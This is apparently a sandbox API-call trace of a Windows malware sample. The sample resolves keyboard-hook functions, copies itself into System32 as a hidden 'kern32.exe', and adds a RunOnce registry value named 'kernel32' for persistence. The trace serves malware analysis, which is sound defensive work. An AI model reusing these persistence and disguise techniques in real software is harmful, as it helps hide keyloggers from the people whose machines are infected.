KERNEL32!GetProcAddress (0x7C800000,"GetFileType")
KERNEL32!GetProcAddress (0x7C800000,"GetTimeZoneInformation")
KERNEL32!GetProcAddress (0x7C800000,"GetSystemTime")
KERNEL32!GetProcAddress (0x7C800000,"GetLocalTime")
KERNEL32!GetProcAddress (0x7C800000,"ResumeThread")
KERNEL32!GetProcAddress (0x7C800000,"CreateThread")
KERNEL32!GetProcAddress (0x7C800000,"TlsSetValue")
KERNEL32!GetProcAddress (0x7C800000,"ExitThread")
KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
KERNEL32!GetProcAddress (0x7C800000,"GetStartupInfoA")
KERNEL32!GetProcAddress (0x7C800000,"GetCommandLineA")
KERNEL32!GetProcAddress (0x7C800000,"GetVersion")
KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
KERNEL32!GetProcAddress (0x7C800000,"MultiByteToWideChar")
KERNEL32!GetProcAddress (0x7C800000,"GetStringTypeA")
KERNEL32!GetProcAddress (0x7C800000,"GetStringTypeW")
KERNEL32!GetProcAddress (0x7C800000,"GetCurrentThreadId")
KERNEL32!GetProcAddress (0x7C800000,"TlsAlloc")
KERNEL32!GetProcAddress (0x7C800000,"SetLastError")
KERNEL32!GetProcAddress (0x7C800000,"TlsGetValue")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"TerminateProcess")
KERNEL32!GetProcAddress (0x7C800000,"GetCurrentProcess")
KERNEL32!GetProcAddress (0x7C800000,"UnhandledExceptionFilter")
KERNEL32!GetProcAddress (0x7C800000,"RtlUnwind")
KERNEL32!GetProcAddress (0x7C800000,"HeapDestroy")
KERNEL32!GetProcAddress (0x7C800000,"HeapCreate")
KERNEL32!GetProcAddress (0x7C800000,"VirtualFree")
KERNEL32!GetProcAddress (0x7C800000,"InitializeCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"DeleteCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"EnterCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"LeaveCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"VirtualAlloc")
KERNEL32!GetProcAddress (0x7C800000,"HeapReAlloc")
KERNEL32!GetProcAddress (0x7C800000,"FreeEnvironmentStringsA")
KERNEL32!GetProcAddress (0x7C800000,"FreeEnvironmentStringsW")
KERNEL32!GetProcAddress (0x7C800000,"WideCharToMultiByte")
KERNEL32!GetProcAddress (0x7C800000,"GetEnvironmentStrings")
KERNEL32!GetProcAddress (0x7C800000,"GetEnvironmentStringsW")
KERNEL32!GetProcAddress (0x7C800000,"SetHandleCount")
KERNEL32!GetProcAddress (0x7C800000,"GetStdHandle")
KERNEL32!GetModuleHandleA ("USER32.dll")
KERNEL32!VirtualAlloc (0x00000000,0x000001EA,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x7200285F-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20040000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413460 accessing page 0x00020040
KERNEL32!GetProcAddress (0x77D30000,"GetForegroundWindow")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00077D35
KERNEL32!GetProcAddress (0x77D30000,"CallNextHookEx")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00077D34
KERNEL32!GetProcAddress (0x77D30000,"GetKeyNameTextA")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00077D31
KERNEL32!GetProcAddress (0x77D30000,"GetWindowTextA")
KERNEL32!GetProcAddress (0x77D30000,"TranslateMessage")
KERNEL32!GetProcAddress (0x77D30000,"GetMessageA")
KERNEL32!GetProcAddress (0x77D30000,"UnhookWindowsHookEx")
KERNEL32!GetProcAddress (0x77D30000,"MessageBoxA")
KERNEL32!GetProcAddress (0x77D30000,"DispatchMessageA")
KERNEL32!GetProcAddress (0x77D30000,"SetWindowsHookExA")
KERNEL32!GetModuleHandleA ("ADVAPI32.dll")
KERNEL32!GetProcAddress (0x77DC0000,"RegCreateKeyExA")
KERNEL32!GetProcAddress (0x77DC0000,"RegSetValueExA")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00077DC2
KERNEL32!GetProcAddress (0x77DC0000,"RegCloseKey")
KERNEL32!GetProcAddress (0x77DC0000,"GetUserNameA")
KERNEL32!GetModuleHandleA ("SHELL32.dll")
KERNEL32!LoadLibraryA ("SHELL32.dll")
KERNEL32!GetModuleHandleA ("SHELL32.dll")
KERNEL32!strcpy (0x4FFD0AC0,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","SHELL32.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\SHELL32.dll",0x00000000)
KERNEL32!GetFileSize (0x00000021,0x00000000)
KERNEL32!_lclose (0x00000021)
KERNEL32!CloseHandle (0x00000021)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\SHELL32.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070006
PageFault tbl process 0x00000000 - 0x00000006 entries, 0x00000000-0x00000000. fhandle=0x72005563.
|offset 0x7C9C0000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x7C9C1000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x7C9C2000, seek 0x00001600, size 0x00000400, flags=0x00000000
|offset 0x7C9C3000, seek 0x00001A00, size 0x00000200, flags=0x00000000
|offset 0x7C9C4000, seek 0x00001C00, size 0x00000200, flags=0x00000000
|offset 0x7C9C5000, seek 0x00001E00, size 0x00000400, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x0007C9C4
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"DeleteFileA")
KERNEL32!GetProcAddress (0x7C800000,"CreateProcessA")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x0007C9C0
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x0007C9C5
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x0007C9C2
KERNEL32!GetProcAddress (0x7C9C0000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!VirtualAlloc (0x00000000,0x00000031,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20050000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413460 accessing page 0x00020050
KERNEL32!GetProcAddress (0x7C9C0000,"ShellExecuteA")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C9C1
KERNEL32!GetModuleHandleA ("WSOCK32.dll")
KERNEL32!LoadLibraryA ("WSOCK32.dll")
KERNEL32!GetModuleHandleA ("WSOCK32.dll")
KERNEL32!strcpy (0x4FFD0AC0,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","WSOCK32.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\WSOCK32.dll",0x00000000)
KERNEL32!GetFileSize (0x00000021,0x00000000)
KERNEL32!_lclose (0x00000021)
KERNEL32!CloseHandle (0x00000021)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\WSOCK32.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070007
PageFault tbl process 0x00000000 - 0x00000008 entries, 0x00000000-0x00000000. fhandle=0x7200546B.
|offset 0x733C0000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x733C1000, seek 0x00000800, size 0x00001000, flags=0x00000000
|offset 0x733C2000, seek 0x00001800, size 0x00001000, flags=0x00000000
|offset 0x733C3000, seek 0x00002800, size 0x00000C00, flags=0x00000000
|offset 0x733C4000, seek 0x00003400, size 0x00000400, flags=0x00000000
|offset 0x733C5000, seek 0x00003800, size 0x00000400, flags=0x00000000
|offset 0x733C6000, seek 0x00003C00, size 0x00001000, flags=0x00000000
|offset 0x733C7000, seek 0x00004C00, size 0x00000C00, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x000733C5
KERNEL32!LoadLibraryA ("ipstack.dll")
KERNEL32!GetModuleHandleA ("ipstack.dll")
KERNEL32!strcpy (0x4FFD0880,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","ipstack.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\ipstack.dll",0x00000000)
KERNEL32!GetFileSize (0x00000021,0x00000000)
KERNEL32!_lclose (0x00000021)
KERNEL32!CloseHandle (0x00000021)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\ipstack.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072006
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070008
PageFault tbl process 0x00000000 - 0x0000000B entries, 0x00000000-0x00000000. fhandle=0x720054F4.
|offset 0x73350000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x73351000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x73352000, seek 0x00001600, size 0x00001000, flags=0x00000000
|offset 0x73353000, seek 0x00002600, size 0x00000A00, flags=0x00000000
|offset 0x73354000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x73355000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x73356000, seek 0x00005000, size 0x00001000, flags=0x00000000
|offset 0x73357000, seek 0x00006000, size 0x00001000, flags=0x00000000
|offset 0x73358000, seek 0x00007000, size 0x00000A00, flags=0x00000000
|offset 0x73359000, seek 0x00007A00, size 0x00000200, flags=0x00000000
|offset 0x7335A000, seek 0x00007C00, size 0x00000200, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00073359
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"GetFileAttributesA")
KERNEL32!GetProcAddress (0x7C800000,"ReadFile")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
KERNEL32!GetProcAddress (0x7C800000,"EnterCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"LeaveCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"ExitThread")
KERNEL32!GetProcAddress (0x7C800000,"GetFileSize")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00073350
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x0007335A
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x00073352
KERNEL32!GetProcAddress (0x73350000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetProcAddress (0x73350000,"ip_reverse_dns")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00073353
KERNEL32!GetProcAddress (0x73350000,"ip_close")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00073351
KERNEL32!GetProcAddress (0x73350000,"ip_connect")
KERNEL32!GetProcAddress (0x73350000,"ip_transfer_data")
KERNEL32!GetProcAddress (0x73350000,"ip_receive_data")
KERNEL32!GetProcAddress (0x73350000,"ip_gethostbyname")
KERNEL32!GetProcAddress (0x73350000,"ip_gethostname")
KERNEL32!GetProcAddress (0x73350000,"ip_retrieve_socket_data")
KERNEL32!GetProcAddress (0x73350000,"ip_release_socket")
KERNEL32!GetProcAddress (0x73350000,"ip_allocate_socket")
KERNEL32!GetProcAddress (0x73350000,"ip_bind_port")
KERNEL32!GetProcAddress (0x73350000,"ip_listen_port")
KERNEL32!GetProcAddress (0x73350000,"ip_getservbyname")
KERNEL32!GetProcAddress (0x73350000,"ip_query_protocol")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"Sleep")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x000733C0
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x000733C6
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80303A accessing page 0x000733C7
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x000733C2
KERNEL32!GetProcAddress (0x733C0000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetProcAddress (0x733C0000,00019)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x000733C1
KERNEL32!GetProcAddress (0x733C0000,00010)
KERNEL32!GetProcAddress (0x733C0000,00009)
KERNEL32!GetProcAddress (0x733C0000,00115)
KERNEL32!GetProcAddress (0x733C0000,00116)
KERNEL32!GetProcAddress (0x733C0000,00016)
KERNEL32!GetProcAddress (0x733C0000,00004)
KERNEL32!GetProcAddress (0x733C0000,00023)
KERNEL32!GetProcAddress (0x733C0000,00003)
KERNEL32!VirtualAlloc (0x00000000,0x00000055,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000001 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20060000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x0000040C
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004130A9 accessing page 0x00020060
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x0000040D
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x0000040E
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x0000040F
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x00000410
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00413128 accessing page 0x00000411
KERNEL32!VirtualFree (0x20060000,0x00000055,0x00004000)
KERNEL32!GetCurrentProcessId ()
KERNEL32!OpenProcess (0x001F0FFF,0x00000000,0x00000100)
KERNEL32!VirtualProtectEx (0x00000001,0x00400000,0x00001000,0x00000004,0x4FFD0BC8)
**EXCEPTION: opcode 0x8DC0 SEH=0x004136FF FaultCode=0xC0000094 EFlags=0x00000204
==>cs:eip 0x002B:0x004136F1 eax=0x00000000 ebx=0x00000100 ecx=0x00000000 edx=0x00400043 esi=0x00413991 edi=0x004000E8 esp=0x4FFD0BBC ebp=0x0000695E
**EXCEPTION: opcode 0xF1FF SEH=0x004137CF FaultCode=0xC0000094 EFlags=0x00000244
==>cs:eip 0x002B:0x004137DD eax=0x00003714 ebx=0x00000000 ecx=0x00000000 edx=0x00400043 esi=0x72005DD0 edi=0x00000000 esp=0x4FFD0BA0 ebp=0x0000695E
**EXCEPTION: opcode 0xF873 SEH=0x004137FB FaultCode=0x80000004 EFlags=0x00000314
==>cs:eip 0x002B:0x00413816 eax=0x4FBBD3D1 ebx=0x00000000 ecx=0x004137CF edx=0x00400043 esi=0x72005ECC edi=0x004137CF esp=0x4FFD0B80 ebp=0x4FFD0B6C
KERNEL32!GetVersion ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00402A65 accessing page 0x0000040A
KERNEL32!HeapCreate (0x00000000,0x00001000,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00403DF9 accessing page 0x0000040B
KERNEL32!HeapAlloc (0x00000001,0x00000000,0x00000140)
KERNEL32!InitializeCriticalSection (0x0040A050)
KERNEL32!InitializeCriticalSection (0x0040A080)
KERNEL32!InitializeCriticalSection (0x0040A068)
KERNEL32!InitializeCriticalSection (0x0040A038)
KERNEL32!TlsAlloc ()
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!HeapAlloc (0x00000001,0x00000008,0x000041C4)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073006
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073002
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073003
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073004
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073005
KERNEL32!VirtualAlloc (0x00000000,0x00100000,0x00002000,0x00000004)
KERNEL32!VirtualAlloc (0x20070000,0x00008000,0x00001000,0x00000004)
PageFault tbl process 0x00000100 - 0x00000008 entries, 0x00000000-0x00000000. fhandle=0xFFFFFFFF.
|offset 0x20070000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20071000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20072000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20073000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20074000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20075000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20076000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x20077000, seek 0x00000000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020070
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020071
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020072
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020073
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020074
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020075
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020076
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00404679 accessing page 0x00020077
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x20070F80)
KERNEL32!GetCurrentThreadId()
KERNEL32!HeapAlloc (0x00000001,0x00000000,0x00000480)
KERNEL32!GetStartupInfoA (0x4FFD0B24)
KERNEL32!GetStdHandle (0xFFFFFFF6)
KERNEL32!GetStdHandle (0xFFFFFFF5)
KERNEL32!GetStdHandle (0xFFFFFFF4)
KERNEL32!SetHandleCount (0x00000020)
KERNEL32!GetCommandLineA ()
KERNEL32!GetEnvironmentStringsW ()
KERNEL32!GetEnvironmentStrings ()
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!FreeEnvironmentStringsA ("=C:=C:\WINDOWS")
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A050)
KERNEL32!InitializeCriticalSection (0x20070E60)
KERNEL32!LeaveCriticalSection (0x0040A050)
KERNEL32!EnterCriticalSection (0x20070E60)
KERNEL32!GetACP ()
KERNEL32!GetCPInfo (0x000004E4,0x4FFD0B30)
KERNEL32!GetCPInfo (0x000004E4,0x4FFD0B08)
KERNEL32!GetStringTypeW (0x00000001,0x004081A8,0x00000001,0x4FFD05C4)
KERNEL32!GetStringTypeA (0x00000000,0x00000001,0x004081A4,0x00000001,0x4FFD05C4)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x004081A8,0x00000001,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x4FFD0388,0x00000100)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x4FFD0388,0x00000100,0x00000000,0x00000000)
KERNEL32!LCMapStringW (0x00000000,0x00000100,0x4FFD0388,0x00000100,0x4FFD0384,0x00000001)
KERNEL32!WideCharToMultiByte (0x000004E4,0x00000220,0x4FFD0384,0x00000001,0x4FFD0908,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x00000000,0x00000000)
KERNEL32!MultiByteToWideChar (0x000004E4,0x00000001,0x4FFD0A08,0x00000100,0x4FFD0368,0x00000100)
KERNEL32!LCMapStringW (0x00000000,0x00000200,0x4FFD0368,0x00000100,0x00000000,0x00000000)
KERNEL32!LCMapStringW (0x00000000,0x00000200,0x4FFD0368,0x00000100,0x4FFD0364,0x00000001)
KERNEL32!WideCharToMultiByte (0x000004E4,0x00000220,0x4FFD0364,0x00000001,0x4FFD0808,0x00000100,0x00000000,0x00000000)
KERNEL32!LeaveCriticalSection (0x20070E60)
KERNEL32!GetModuleFileNameA (0x00000000,0x0040A098,0x00000104)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!HeapAlloc (0x00000001,0x00000008,0x00000800)
KERNEL32!GetStartupInfoA (0x4FFD0B8C)
KERNEL32!GetModuleHandleA (NULL)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004011AD accessing page 0x0004FFCF
KERNEL32!GetModuleFileNameA (0x00000000,0x4FFD0158,0x00000200)
KERNEL32!GetSystemDirectoryA (0x4FFCFD58,0x000001FB)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77D34E90 accessing page 0x00077D37
USER32!MessageBoxA (0x00000000,"sample, te amo!","sample",0x00000030)
USER32!wsprintfA (0x4FFCF930,"Display message box (%s) : %s",0x4FFCFF58....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072007
KERNEL32!DeleteFileA ("C:\WINDOWS\SYSTEM32\kern32.exe")
KERNEL32!CopyFileA ("c:\sample.exe","C:\WINDOWS\SYSTEM32\kern32.exe",0x00000000)
KERNEL32!GetFileAttributesA ("C:\WINDOWS\SYSTEM32\kern32.exe")
KERNEL32!GetFileAttributesA ("C:\WINDOWS\SYSTEM32\kern32.exe")
KERNEL32!CreateFileA ("c:\sample.exe",0x80000000,0x00000000,0x00000000,0x00000003,0x00000000,0x00000000)
KERNEL32!GetFileSize (0x00000021,0x00000000)
KERNEL32!CreateFileA ("C:\WINDOWS\SYSTEM32\kern32.exe",0x40000000,0x00000000,0x00000000,0x00000002,0x00000000,0x00000000)
KERNEL32!GetFileSize (0x00000022,0x00000000)
KERNEL32!GetFileSize (0x00000021,0x00000000)
KERNEL32!HeapAlloc (0x00000000,0x00000000,0x00008000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007300E
KERNEL32!ReadFile (0x00000021,0x730069A8,0x00008000,0x00000000,0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00073007
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00073008
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00073009
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x0007300A
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x0007300B
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x0007300C
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x0007300D
KERNEL32!WriteFile (0x00000022,0x730069A8,0x00008000,0x00000000,0x00000000)
KERNEL32!ReadFile (0x00000021,0x730069A8,0x00006400,0x00000000,0x00000000)
KERNEL32!WriteFile (0x00000022,0x730069A8,0x00006400,0x00000000,0x00000000)
KERNEL32!CloseHandle (0x00000022)
KERNEL32!CloseHandle (0x00000021)
KERNEL32!SetFileAttributesA ("C:\WINDOWS\SYSTEM32\kern32.exe",0x00000006)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77DC3100 accessing page 0x00077DC1
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x77DC1014 accessing page 0x00077DC4
ADVAPI32!RegCreateKeyExA (0x80000002,"Software\Microsoft\Windows\CurrentVersion\RunOnce",0x00000000,NULL,0x00000000,0x000F003F,0x00000000,0x4FFCFD54,0x00000000)
PageFault tbl process 0x00000000 - 0x00000006 entries, 0x00000000-0x00000000. fhandle=0x720060A4.
|offset 0x70009000, seek 0x00000000, size 0x00001000, flags=0x00000000
|offset 0x7000A000, seek 0x00001000, size 0x00001000, flags=0x00000000
|offset 0x7000B000, seek 0x00002000, size 0x00001000, flags=0x00000000
|offset 0x7000C000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x7000D000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x7000E000, seek 0x00005000, size 0x00001000, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000E
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000D
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000C
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000B
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x0007000A
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0004D6B accessing page 0x00070009
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072008
ADVAPI32!RegSetValueExA (0x7200614B,"kernel32",0x00000000,0x00000001,"C:\WINDOWS\SYSTEM32\kern32.exe -sys",0x00000023)
ADVAPI32!RegCloseKey (0x7200614B)
KERNEL32!CreateMutexA (0x00000000,0x00000000,"SrVFrK")
KERNEL32!GetLastError ()
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070F00,0x00000004,0x20070F00)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
